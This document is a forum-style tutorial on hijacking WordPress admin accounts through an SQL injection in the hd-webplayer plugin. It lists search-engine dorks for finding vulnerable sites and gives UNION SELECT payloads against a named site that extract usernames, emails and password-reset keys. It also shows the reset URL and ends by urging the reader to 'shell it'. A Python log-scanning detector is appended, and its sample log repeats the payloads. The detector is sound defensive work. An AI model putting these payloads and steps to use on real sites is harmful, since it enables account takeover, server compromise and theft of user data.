[Tutorial] Hack WordPress site with SQL injection

As requested by a few of you, I decided to make this small tutorial on how to hack a WordPress site that has an SQLi in a plugin.


So let's begin.

I will use this 0day here, by AMY hacker.

First of all we need to find a vulnerable page.
We enter this in Google:

Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

When you have found your site, you need to find the admin email and username.
I will be using this site as an example:


Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3



When I add a ' the text disappears, so it is vulnerable.

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:



Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--



Now we have 2 users.

We pick one and copy his email.
Go to the login page of the site.
It is usually here:


Code:
http://www.site.com/wp-login.php

And press "Lost your password?"

Now you enter either the username or the email.
Either one is accepted, so it doesn't matter.
I entered the email.

Now when you get:

"Check your e-mail for the confirmation link."

it means that the reset key has been sent successfully.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:



Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.



Go to:


Code:
wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace the key= and login= values.

So my link will be:

Log in with the new password and shell it.
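From the defender's side, the sequence above leaves a recognizable trace in the web server access log: a plugin URL carrying a UNION SELECT that reads wp_users, then a lost-password request, then a second read of user_activation_key. The following Python is an added example, not part of the original post, that scans constructed access-log lines for that pattern; the log lines, the IP addresses and the function names classify and detect_wp_sqli are my own.

```python
import re
from urllib.parse import unquote_plus

# One combined-style access-log line: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Signatures derived from the requests shown in the post; applied to the percent-decoded path.
PLUGIN_RE = re.compile(r'^/wp-content/plugins/hd-webplayer/', re.I)
SQLI_RE = re.compile(r'\bunion\b.{0,40}\bselect\b', re.I | re.S)
WP_USERS_RE = re.compile(r'\bwp_users\b', re.I)
KEY_RE = re.compile(r'\buser_activation_key\b', re.I)

def classify(path):
    """Label one request path, or return None if it looks benign."""
    decoded = unquote_plus(path)  # turn %20 and + back into spaces before matching
    if decoded.startswith('/wp-login.php') and 'action=lostpassword' in decoded:
        return 'password_reset_request'
    if PLUGIN_RE.match(decoded):
        if SQLI_RE.search(decoded) and KEY_RE.search(decoded):
            return 'sqli_reads_activation_key'   # the step that yields a usable reset link
        if SQLI_RE.search(decoded) and WP_USERS_RE.search(decoded):
            return 'sqli_reads_wp_users'
        if decoded.endswith("'"):
            return 'sqli_probe'                  # the lone quote used to test the parameter
    return None

def detect_wp_sqli(log_text):
    """Return ({ip: [labels in log order]}, [ips that paired a wp_users read with a reset request])."""
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue   # skip lines that are not in the expected format
        label = classify(m.group('path'))
        if label:
            findings.setdefault(m.group('ip'), []).append(label)
    takeover = sorted(ip for ip, labels in findings.items()
                      if 'password_reset_request' in labels
                      and any(l.startswith('sqli_reads') for l in labels))
    return findings, takeover

# Constructed sample log (not real traffic): one client walks through the post's steps, encoded
# as a browser would send them; the last line is an unrelated, benign request.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3%27 HTTP/1.1" 200 0
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=-3%20UNION%20SELECT%201,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11%20FROM%20wp_users-- HTTP/1.1" 200 640
203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.7 - - [01/Jan/2024:10:00:31 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+UNION+SELECT+1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11+FROM+wp_users-- HTTP/1.1" 200 700
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=12 HTTP/1.1" 200 815
"""
```

Running detect_wp_sqli(SAMPLE_LOG) flags 203.0.113.7 as the takeover candidate while the benign client is not reported; in practice the same correlation belongs in a SIEM rule keyed on client IP within a short time window.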